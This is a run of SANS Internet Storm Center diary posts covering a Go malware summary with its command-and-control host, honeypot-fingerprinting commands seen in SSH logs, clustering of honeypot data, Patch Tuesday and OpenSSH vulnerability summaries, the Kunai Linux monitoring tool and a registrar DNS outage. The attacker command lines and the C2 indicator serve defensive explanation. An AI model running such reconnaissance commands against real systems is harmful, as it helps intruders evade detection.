The malware was written in Go, and Virustotal's "Behaviour" analysis does a pretty good job in summarizing the binary.

• The binary uses crontab and systemd for persistence.
• it uses sosbot.icu on port 1314 for command and control
•  

[1] https://github.com/nette/application/security/advisories/GHSA-8gv3-3j7f-wg94
[2] https://www.virustotal.com/gui/file/8325bfc699f899d0190e36ea339540ea0590aea0e1b22b8a2dcec3ff8b5763b8

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

Some of the commands observed can be confusing for a novice looking at ssh honeypot logs. Sure, you have some obvious commands like "uname -a" to fingerprint the kernel. However, other commands are less intuitive and are not commands a normal user would use. I am trying to summarize some of the more common ones here, focusing on commands attackers use to figure out if they are inside a honeypot.

busybox dd if=$SHELL bs=22 count=1||dd if=/proc/self/exe bs=22 count=1||while read i;do busybox echo -n $i;done</proc/self/exe||cat /proc/self/exe

There is a lot going on with this line. Let's take it apart one command at a time:

busybox: Busybox is a special binary found on many IoT style systems. It fulfills the role of various other Linux utilities in one small package. It is often symlinked from other names like "ls". 

dd: "dd" (disk dump) is often used to copy disk images. But it can be used to read/write any binary file. Here the attacker reads the first 22 bytes of the "$SHELL" binary, usually something like "/bin/bash". A typical output would be " ELF>" for an ELF binary.

Next, the attacker is doing the same to the current binary (/proc/self/exe). I believe the purpose of this command line may be to eliminate some honeypots as this command will not work in simulations like cowrie.

I have seen variations of this like for example:

dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s

/bin/busybox dd if=/bin/busybox bs=22 count=1||while read i;do /bin/busybox echo -n $i;done</bin/busybox||cat /proc/self/exe

The next line uses a slightly different trick to figure out if the attacker is inside a honeypot:

cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox ZRKTA

/dev/shm is the "ramdisk", a special file system found on most Linux systems. Here the attacker just copies a file to it to see if the copy succeeds. The attacker first views the content of the file ".s", and later copies the echo command to .s just to see if there are any errors. The busybox command at the end just serves as a simple marker to note that the commands completed.

Next a partial command I see a lot:

(/bin/busybox echo -e \"\\x44\\x49\\x52\"||echo -e \"\\x44\\x49\\x52\")

"echo -e" will output the text identified by he ASCII hex codes. The exact output may vary a bit from system to system as "-e" is not a standard option. But you will get something like

$ echo -e \"\\x44\\x49\\x52\"
"DIR"

Adding this as an argument to busybox is an attempt to execute a "DIR" command. The goal is not to execute the "DIR" command (it does not exist in Linux). Instead, seeing the "DIR" output will tell the attacker that the command succeeded. 

Seen any other tricks used by attackers lately? Any questions about an odd command logged by cowrie? Let me know! :) 

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

Sometimes data needs to be transformed or different tools need to be used so that it can be compared with other data. Some honeypot data is easy to compare since there is no customized information such as randomly generated file names, IP addresses, etc.

Figure 1: Common commands seen across multiple honeypots

The examples above are easy to compare and from the most commonly seen commands used, there is a large overlap seen by different honeypots. Are those the most common commands? What about commands that are very similar, but have small differences?

Figure 2: Commands used to change passwords, but with differences in the username or password supplied.

Password change attempts are just one example of commands that are very similar, with small changes in input. From the dataset, there are 77,214 instances of "passwd" being used in a command. This means that it could be the most commonly used command seen for all of the honeypots. It's been seen over 20,000 more times than the top command seen in Figure 1. From this quick filter using DB Browser for SQLite [1], very quickly a list of possibly similar commands was generated. With only 80,715 total rows, almost 97% of the commands might be password changes. An option would be to take the list as it is. Unfortunately, this can imply a grouping that may not be desired. There are some commands that also contain "passwd", but are not strictly password changes. In the example below, we see a contatenated command that includes creating a user account and setting a new password for it. It would be nice to get a list of similar commands.

Figure 3: Commands with "passwd", but fom very different commands

DBSCAN (Density-Based Spatial Clustering of Applications with Noise)

DBSCAN [2] was introduced to me in SEC 595, Applied Data Science and AI/Machine Learning for Cybersecurity Professionals [3]. To start out, I need to dermine the following:

• Dataset
• Features (features of the data that help to separate data into different clusters)
• Minimum Samples (min_samples)
• Epsilon (eps)

Dataset

To help reduce the data to be analized, a subset of the orignial data was used. Only rows with at least honeypot not having any results was extracted.

# unique_commands holds data read from SQLite file
# get any rows that contain a 0
unique_commands = commands[(commands == 0).any(axis=1)]

# 'index' is the column of commands
# extract the "index" column
unique_commands = unique_commands.loc[:, :"index"]

Features

As a starting point, I decided to see what would happen when just trying to use character frequencies as features. Some characters were selected based on what is seen within the data.

# using string to take advantage of built in character collections
import string

# create a list with all characters to count (get a frequency for)
chars_to_count = list(string.ascii_uppercase) + list(string.ascii_lowercase)
chars_to_count += [";", "\\/", "\\//", "\\=", "\\$", " ", ",", "_", ".", "\\%", "\\&"]

# add columns for each character, including the count for that character seen within each command
for each_char in chars_to_count:
    unique_commands[each_char] = unique_commands[column_label].str.count(each_char)

# Comparisons used: ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 
# 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 
# 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', ';', '\
# \/', '\\//', '\\=', '\\$', ' ', ',', '_', '.', '\\%', '\\&']

Minimum Samples and Epsilon

I decided to experimentally change "min_samples" and "eps" to see how it impacted the number of clusters created and what was created within those clusters. In general, the following is true:

• Lower "eps" = more clusters
• Lower "min_samples" = more clusters

# 3, 4, 5, 6, 7, 8, 9, 10, 11 for min_samples
minsamples_values = range(3, 11, 1)

# .5 to 2.5, incrementing by .1
eps_values = []
current_value = .5
limit = 2.5
while current_value <= limit:
    eps_values.append(current_value)
    current_value = round(current_value + .1, 1)

Cluster Differences

Min Number of Clusters:5
Max Number of Clusters: 73
Average: 18

Figure 4: Plot of the number of clusters formed based on "eps" and "min_samples" value changes.

Overall, the data was not surpising in thta lower "eps" values and "min_sample" values created more clusters. Let's take a look at the middle for a low "min_sample" value with a cluster size of 46 (eps=0.7, min_samples=3).

Figure 5: Except of clutered data with an incorrect cluster highlighted

Cluster 5 shows some promise in terms of the clusters being created. Cluster 6 shows an outlier but overall still looks very good. One of the challenges from the data being used is:

• High number of features
• Number of characters (len) is causing inaccurate clustering and could be weighted too high
• Some characters present in the data not being used as features ("@", "<", ">", and "=" not represented)

Changing Features

To see if changing the features could help, the features were changed and included only special characters seen within the data (numbers and letters were filtered out).

# create a dictionary that contains every character and the number of times it is represented
command_char_counts = {}
for each_item in unique_commands["index"]:
    for each_char in each_item:

        # exclude numbers
        if not each_char.isdigit():

            #exclude letters
            if not each_char in list(string.ascii_letters):
                if each_char in command_char_counts:
                    command_char_counts[each_char] += 1
                else:
                    command_char_counts[each_char] = 1

# create new columns for special characters seen within the data
for char, count in command_char_counts.items():
    if char == "." or char == "|":
        char = "\\" + char
    try:
        unique_commands[char] = unique_commands[column_label].str.count(char)
    except:
        char = "\\" + char
        unique_commands[char] = unique_commands[column_label].str.count(char)

# Comparisons used: ['/', '>', '@', "'", '#', '!', ';', '=', '$', ':', '\\.', '-', '\\+', '"', '\\
# \\', '\\|', '\\?', '&', '^', '%', '\\[', ']', '<', '\\(', '\\)', ',', '_', '\\*', '{', '}', 
# '\n', '~']

This strategy seems like it would help since it is less overall features. Unfortunately, I ran into memory errors after hitting an eps of 1.3.

• min_samples = 3, eps = 1.2 --> worked
• min_samples = 3, eps = 1.3 --> memory error on dbscan.fit(reduced)

Since I ran into issues where I could automate a variety of "min_samples" and "eps" values, I decided to try to change features again, aiming for even less features.

Changing Features (again)

Based on some of the commands contained within the data, the following features were selected:

• "appends" (contatenated commands, containing " && ")
• "args1" (command arguments starting with "+")
• "args2" (command arguements starting with "-")
• "outputs" (commands with output " > ")
• "conditionals" (commands with " if ")
• "command_parts" (number of individual commands separated by semicolon ";")
• "length" (total command length)
• "partn_length (length of the last part, separated by semicolon ";")
• "partn_minus_1_length" (length of the second last part, separated by semicolon ";")
• "partn_minus_2_length" (length of the third last part, separated by semicolon ";")

def find_pattern_instance_num(string, pattern):
    return len(re.findall(rf'.*({pattern}).*', string))

def find_part_num(string, splitchars):
    return len(string.split(splitchars))

def find_part_length(string, splitchars, segment):
    try:
        return len(string.split(splitchars)[segment])
    except:
        return 0

appends = [find_pattern_instance_num(index, " && ") for index in unique_commands[column_label]]
args1 = [find_pattern_instance_num(index, " +[A-Za-z] ") for index in unique_commands[column_label]]
args2 = [find_pattern_instance_num(index, " -[A-Za-z] ") for index in unique_commands[column_label]]
outputs = [find_pattern_instance_num(index, " > ") for index in unique_commands[column_label]]
conditionals = [find_pattern_instance_num(index, " if ") for index in unique_commands[column_label]]
command_parts = [find_part_num(index, ";") for index in unique_commands[column_label]]
length = [len(index) for index in unique_commands[column_label]]
partn_length = [find_part_length(index, ';', -1) for index in unique_commands[column_label]]
partn_minus_1_length = [find_part_length(index, ';', -2) for index in unique_commands[column_label]]
partn_minus_2_length = [find_part_length(index, ';', -3) for index in unique_commands[column_label]]

unique_commands["appends"] = appends
unique_commands["args1"] = args1
unique_commands["args2"] = args2
unique_commands["outputs"] = outputs
unique_commands["conditionals"] = conditionals
unique_commands["command_parts"] = command_parts
unique_commands["length"] = length
unique_commands["partn_length"] = partn_length
unique_commands["partn_minus_1_length"] = partn_minus_1_length
unique_commands["partn_minus_2_length"] = partn_minus_2_length

Min Number of Clusters:10
Max Number of Clusters: 113
Average: 34.75

Data reviewed: eps = .5, min_samples = 9, clusters = 46

Looking at the original outlier it appears that it is now in cluster "-1", meaning it is grouped as an outlier.

Figure 6: Data previously group incorrectly into a cluster now shown as an outlier

This doesn't mean that the clusters perfect or even more accurate overall, but it does show the impact when changing features and other DBSCAN variables. Experimenting with different values can be helpeful when trying to determine the best settings for your data analysis.

Looking back at the original problem, how did things sort out with different commands containing "passwd"?

Figure 7: Commands listed with their associated cluster and total items seen per cluster.

The original command that was an issue (cluster 37) is now separated. There are more clusters than desired for the password password change attempts starting with "echo". This could still be classified manually since there are a low number of clusters. The issue here is that the only value being used to cluster this data is the length of the command itself.

Figure 8: Password change cluster showing length as the clustering feature

We'll see where this ends up, but some good things to keep in mind when performing clustering:

• Experiment with different eps, min_samples and features
• Save data to review later so that it can be used to further tailor your variables
• Putting some thought into features can help tremendously, but it requires understanding the data

[1] https://sqlitebrowser.org/
[2] https://scikit-learn.org/dev/auto_examples/cluster/plot_dbscan.html
[3] https://www.sans.org/cyber-security-courses/applied-data-science-machine-learning/

--
Jesse La Grew
Handler

Microsoft today released patches for 142 vulnerabilities. Only four of the vulnerabilities are rated as "critical". There are two vulnerabilities that have already been discussed and two that have already been exploited.

Noteworthy Vulnerabilities:

CVE-2024-38080: Windows Hyper-V Elevation of Privilege Vulnerability (exploited vulnerability)

An attacker can obtain SYSTEM privilege by exploiting this integer overflow. 

CVE-2024-38112: Windows MSHTML Platform Spoofing Vulnerability

I haven't seen any details disclosed yet. However, these vulnerabilities typically make it difficult to identify the nature and origin of an attachment. A victim may be tricked into opening a malicious attachment, leading to code execution. There have been numerous similar vulnerabilities in the past.

CVE-2024-35264: .NET and Visual Studio Remote Code Execution Vulnerability (disclosed vulnerability)

CVSS score for this vulnerability is 8.1. It is not considered critical. The vulnerability is exploited by closing an http/3 connection while the body is still being processed. The attacker must take advantage of a race condition to execute code.

CVE-2024-37985: Systematic Identification and Characterization of Proprietary Prefetchers (disclosed vulnerability)

This vulnerability only affects ARM systems. An attacker would be able to view privileged heap memory.

CVE-2024-38074, CVE-2024-38076, CVE-2024-38077: Windows Remote Desktop Licensing Service Remote Code Execution Vulnerability

Three of the four critical vulnerabilities affect the RDP Licensing Service. Watch our for PoC exploits for this vulnerability.

CVE-2024-38060: Windows Imaging Component Remote Code Execution Vulnerability

The WIC is the Windows framework used to parse images and related metadata. Toe trigger the vulnerability, an authenticated attacker must upload a TIFF image to a server.

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

Microsoft has a very popular tool (part of the SysInternals) called Sysmon[1]. It is a system service and device driver designed to monitor and log system activity, including very useful events like process creations, network connections, DNS requests, file changes, and more. This tool is deployed by many organizations because it’s a great companion to expand the visibility of your Windows environments. Many SOCs rely on it to perform investigations and hunting.

A while ago, Microsoft decided to port Sysmon on Linux and, logically, called it SysmonForLinux[2].  Unfortunately, the tool never gets the same attraction, for multiple reasons. First of all, the core developer left Microsoft after the first release of the tool and it definitively lacks updates and follow-up. A good way to check this is to have a look at the open issues on the GitHub repository. There was a small update a few months ago but without new exciting features. Then, Microsoft tried to reproduce Sysmon for Windows but the two operating systems do not work in the same way. Anyway, I tested SysmonForLinux[3] (and it’s still running on the server) but I don’t use it in production.

Last week, I attended « Pass The Salt », a conference focussing on open-source software and cybersecurity. I participated in a very interesting workshop about « Kunai ». This tool, developed by Quentin Jérôme from CIRCL (the Luxembourg CERT) aims to replace SysmonForLinux. Its goal is to record and log system activity but in a more «Linux-oriented» flavor. It was presented for the first time at hack.lu in 2023 and it now reaches enough maturity to be tested and deployed on some Linux hosts.

Kunai is developed in Rust and uses eBPF to interact with the kernel (compatible with all the Linux LTS kernels(from 5.4 to 6.6). eBPF programs can be attached to various hooks in the kernel, such as system calls, tracepoints, and network events, allowing them to run in response to specific events or conditions.

Kunai's core features are:

• Single executable (really simple to deploy)
• Events are enriched with a lot of data
• Support for containers, namespaces
• Filtering (to reduce the noise - this is a critical step in your deployment!)
• Hunting (based on an IOC list)
• JSON output to log events

To test it, just run Kunai as root:

$ sudo ./kunai | tee -a /var/log/kunai/events.log | jq .

This command will launch a Kunai that will log all events without filters. Let’s take a quick test:

$ curl https://isc.sans.edu

Curl will generate a lot of events (with the default config) but some of them are interesting.

Creation of the process:

{
  "data": {
    "ancestors": "/usr/lib/systemd/systemd|/usr/sbin/sshd|/usr/sbin/sshd|/usr/sbin/sshd|/usr/bin/bash",
    "parent_exe": "/usr/bin/bash",
    "command_line": "curl https://isc.sans.edu",
    "exe": {
      "file": "/usr/bin/curl",
      "md5": "25828b12203bb53e5f9bc54d2f8507a7",
      "sha1": "4bfe301715d6564404f6ebd56156c668329cc83b",
      "sha256": "53a2fe036f8def7b4372246ffa7835f97cdeb17268e7c8df9756f42baf28cc0f",
      "sha512": "c01c7298103bd2adaf432a807c65d2eccfbed9ce820d80424d03accdceb9c801167f65cfb93ea1b5677fdbf8235e34de061a449f03fd45d58fd913dce139aa51",
      "size": 260328
    }
  },
  "info": {
    "host": {
      "uuid": "2bb02904-9daa-5be5-adcb-5371b78c1866",
      "name": "ubuntu-vm",
      "container": null
    },
    "event": {
      "source": "kunai",
      "id": 1,
      "name": "execve",
      "uuid": "be8c77c8-ec40-959d-87af-39e19364f277",
      "batch": 161
    },
    "task": {
      "name": "curl",
      "pid": 9301,
      "tgid": 9301,
      "guuid": "09e8471d-730a-0000-c3d5-65bb55240000",
      "uid": 1000,
      "gid": 1000,
      "namespaces": {
        "mnt": 4026531841
      },
      "flags": "0x400000"
    },
    "parent_task": {
      "name": "bash",
      "pid": 9292,
      "tgid": 9292,
      "guuid": "95447ea0-6d0a-0000-c3d5-65bb4c240000",
      "uid": 1000,
      "gid": 1000,
      "namespaces": {
        "mnt": 4026531841
      },
      "flags": "0x400000"
    },
    "utc_time": "2024-07-06T05:27:19.916790817Z"
  }
}

The corresponding DNS Request:

{
  "data": {
    "ancestors": "/usr/lib/systemd/systemd|/usr/sbin/sshd|/usr/sbin/sshd|/usr/sbin/sshd|/usr/bin/bash|/usr/bin/sudo|/usr/bin/sudo|/usr/bin/bash",
    "command_line": "curl https://isc.sans.edu",
    "exe": {
      "file": "/usr/bin/curl"
    },
    "query": "isc.sans.edu",
    "proto": "udp",
    "response": "45.60.31.34;45.60.103.34",
    "dns_server": {
      "ip": "127.0.0.53",
      "port": 53,
      "public": true,
      "is_v6": false
    }
  },
  "info": {
    "host": {
      "uuid": "2bb02904-9daa-5be5-adcb-5371b78c1866",
      "name": "ubuntu-vm",
      "container": null
    },
    "event": {
      "source": "kunai",
      "id": 61,
      "name": "dns_query",
      "uuid": "5850ea54-ee1f-c38f-3dc6-294d8ae689b0",
      "batch": 3355
    },
    "task": {
      "name": "curl",
      "pid": 2350,
      "tgid": 2349,
      "guuid": "d12e76a0-7e02-0000-b116-fe882d090000",
      "uid": 0,
      "gid": 0,
      "namespaces": {
        "mnt": 4026531841
      },
      "flags": "0x400040"
    },
    "parent_task": {
      "name": "bash",
      "pid": 1709,
      "tgid": 1709,
      "guuid": "2672a103-1100-0000-b116-fe88ad060000",
      "uid": 0,
      "gid": 0,
      "namespaces": {
        "mnt": 4026531841
      },
      "flags": "0x400100"
    },
    "utc_time": "2024-07-06T05:27:19.942717828Z"
  }
}

I like the "ancestors" field that reveals the complete process tree!

One of the critical tasks to perform with Kunai is to know what you’re looking for and filter unwanted events (exactly like Sysmon). The simple curl command tested above generated 49 events! Most of them are of the type ‘mmap_exec’. This event is generated whenever the mmap[4] syscall is used to map an executable file in memory, with memory execution protection. This syscall is typically related to loading a dynamic library but it may reveal some malicious activity when malware tries to load a shellcode by example.

Logically, you can write filters to reduce the noise and get rid of these events. Here, Kunay and Sysmon work in the same way: try to reduce the noise but not too much or you increase chances of missing interesting events. 

Here is a simple filter:

$ cat filter.yaml
name: log.interesting_events
params:
    filter: true
match-on:
    events:
        kunai: [ 1,2,61 ]

The list is supported events is available in the documentation[5]. In the example above, we will record only:

• Execve (ID 1) 
• Execve script (reports more details about script interpreters) (ID 2)
• Dns query (ID 61)

Now restart Kunai:

$ sudo ./kunai -r filter.yaml | tee -a /var/log/kunai/events.log | jq .

You can also hunt for specific IOCs by providing another configuration file:

$ cat simple_ioc.json
{"uuid": "435358ae-4ca0-4573-8b9f-cd725de75103", "source": “misp”, "value": “8.8.8.8”}

“Value” can be a hash, a path, an IP or a domain/FQDN.

$ sudo ./kunai -I simple_ioc.json | tee -a /var/log/kunai/events.log | jq .

To generate a list of interesting IOCs, there is an integration available with a tool that extracts data from your MISP instance and generates a file compatible with Kunai:

$ ./misp-to-kunai.py -h
usage: misp-to-kunai.py [-h] [-c CONFIG] [-s] [-l LAST] [-o OUTPUT] [--overwrite] [--all] [--tags TAGS] [--wait WAIT] [--service]

Tool pulling IoCs from a MISP instance and converting them to be loadable in Kunai

options:
  -h, --help            show this help message and exit
  -c CONFIG, --config CONFIG
                        Configuration file. Default: /opt/workshops/tools/misp/config.toml
  -s, --silent          Silent HTTPS warnings
  -l LAST, --last LAST  Process events updated the last days
  -o OUTPUT, --output OUTPUT
                        Output file
  --overwrite           Overwrite output file (default is to append)
  --all                 Process all events, published and unpublished. By default only published events are processed.
  --tags TAGS           Comma separated list of (event tags) to pull iocs for
  --wait WAIT           Wait time in seconds between to runs in service mode
  --service             Run in service mode (i.e endless loop)

Kunai still must be improved. During the workshop, we had great exchanges with the developer and gave some ideas. For example, there is a lack of integration with the system: No automatic log management (like rotation), you need to write your own systemd integration to start/stop it automatically.

I'm testing the tool on some hosts and processing JSON data in my Splunk instance. It provides great visibility for Linux systems! Worth mentioning, that the impact on system performance remains acceptable (but it will directly be related to the logging policy that you'll use).

[1] https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon
[2] https://github.com/Sysinternals/SysmonForLinux
[3] https://isc.sans.edu/diary/Whos+Resolving+This+Domain/29462
[4] https://man7.org/linux/man-pages/man2/mmap.2.html
[5] https://why.kunai.rocks/docs/category/kunai---events

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

I often think the Internet would work better without DNS. People unable to remember an IP address would be unable to use it. But on the other hand, there is more to DNS than translating a human-readable hostname to a "machine-readable" IP address. DNS does allow us to use consistent labels even as the IP address changes.

Many critical resources are only referred to by hostname, not by IP address. This does include part of the DNS infrastructure itself. NS records point to hostnames, not IP addresses, and we use glue records (A records, actually) to resolve them. Organizations typically rely on multiple authoritative name servers that automatically replicate updates between them to provide resiliency for DNS. This process is typically quite reliant, and cloud providers offer additional services to ensure data availability. Anycast name servers can provide additional resilience to this setup.

However, there is a weak point in this setup: Registrars. Yesterday, Hurricane Electric, a significant internet transit provider, experienced this problem [1]. 

As an internet transit provider, Hurricane Electric relies on BGP (Border Gateway Protocol) to route traffic to and from its customers. The associate routers are identified with hostnames like "ns1-ns5.he.net". However, yesterday the name resolution for he.net failed. It probably didn't help that this happened on a major holiday in the US.

The domain "he.net" is hosted with Network Solutions. Network Solutions is one of the "original" domain registrars but has been going through the usual acquisitions and mergers. They currently appear to be owned by Newfold, a company that happens to be located in Jacksonville, FL, where I happen to reside, too.

Yesterday, he.net stopped resolving. The technical issue was that the he.net domain was removed from the .net zone. Without any nameservers being returned by .net nameservers, clients could not resolve he.net names. The registrar is responsible for maintaining this information. Registrars are "special" because they have the contracts in place to update these top-level domains with whoever maintains them. Whois can be used to identify these relationships. For he.net, the whois record returned [2]: 

   Domain Name: HE.NET
   Registry Domain ID: 486609_DOMAIN_NET-VRSN
   Registrar WHOIS Server: whois.networksolutions.com
   Registrar URL: http://networksolutions.com
   Updated Date: 2024-07-04T15:06:46Z
   Creation Date: 1995-07-31T04:00:00Z
   Registry Expiry Date: 2033-07-30T04:00:00Z
   Registrar: Network Solutions, LLC
   Registrar IANA ID: 2
   Registrar Abuse Contact Email: domain.operations at web.com
   Registrar Abuse Contact Phone: +1.8777228662
   Domain Status: clientHold https://icann.org/epp#clientHold
   Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited

I highlighted the important line in red: The domain is marked as "clientHold". According to ICANN, this means:

This status code tells your domain's registry to not activate your domain in the DNS and as a consequence, it will not resolve. It is an uncommon status that is usually enacted during legal disputes, non-payment, or when your domain is subject to deletion. 

Often, this status indicates an issue with your domain that needs resolution. If so, you should contact your registrar to resolve the issue. If your domain does not have any issues, but you need it to resolve, you must first contact your registrar and request that they remove this status code.

According to Hurricane Electric, someone maliciously or accidentally reported a page at he.net for phishing. Network Solutions, in return, set the "client hold" status, which effectively removed he.net from DNS. The issue was amplified by Network Solution not offering a simple customer support channel to resolve the issue. It took several hours to resolve, leading to routing issues for he.net customers.

Sadly, I don't think there is a "simple" solution for this issue. Of course, you should select a reliable registrar with reasonable customer support offerings. But I am not sure one exists. Network Solutions is offering competitive pricing but is not the cheapest domain registrar. For convenience, I do like to keep all my domains with one registrar. But this may backfire if you have a dispute with that one registrar.

Using different domains for different purposes can also help. This way, if one of your domains is having issues, you can still use the other domain to communicate.

And communication goes both ways. Just as you must be able to reach your registrar, your registrar must be able to reach you to resolve issues. It is unclear if Network Solutions attempted to reach out to Hurricane Electric after Network Solutions received the phishing complaint. It can also be counterproductive to use privacy features for business domains. Offering valid contact information in Whois may help someone report an issue to you directly versus going through a registrar first. Of course, this will not help if the report is meant to be malicious.

The Hurricane Electic incident is still very fresh, and we may not yet know all the details, but keep an eye out for any post mortems with more details from either Hurricane Electric or Network Solutions.

[1] https://x.com/henet/status/1808953880404787288
[2] https://puck.nether.net/pipermail/outages/2024-July/015214.html

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

Qualys published a blog posts with details regarding a critical remote code execution vulnerability [1]

This week is far from ideal to have to deal with a critical vulnerability in widely used software like OpenSSH. So I want to save you some time by summarizing the most important points in a very brief post:

• The CVEs associated with this vulnerability are CVE-2006-5051 and CVE-2024-6387,
• The reason for the two CVE numbers and the use of the old 2006 CVE number is that this is a regression. An old vulnerability that came back. Sadly, this happens somewhat regularly (not with OpenSSH, but software in general) if developers do not add tests to ensure the vulnerability is patched in future versions. Missing comments are another reason for these regressions. A developer may remove a test they consider unnecessary. 
• The vulnerability does allow arbitrary remote code execution without authentication.
• OpenSSH versions up to 4.4p1 are vulnerable to CVE-2006-5051
• OpenSSH versions from 8.5p1 to 9.8p1 (this is the version patched version)
• Remember that many Linux distributions will not increase version numbers if they are backporting a patch
• This is a timing issue, and exploitation is not easily reproducible but takes about 10,000 attempts on x86 (32-bit).
• This speed of exploitation is limited by the MaxStartups and LoginGraceTime.
• Exploitation for AMD64 appears to be not practical at this time.

Most Linux systems are currently running on 64-bit architectures. However, this could be a big deal for legacy systems / IoT systems in particular if no more patches are available. Limiting the rate of new connections using a network firewall may make exploitation less likely in these cases. First of all, a patch should be applied. But if no patch is available, port knocking, moving the server to an odd port or allowlisting specific IPs may be an option.

[1] https://blog.qualys.com/vulnerabilities-threat-research/2024/07/01/regresshion-remote-unauthenticated-code-execution-vulnerability-in-openssh-server

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|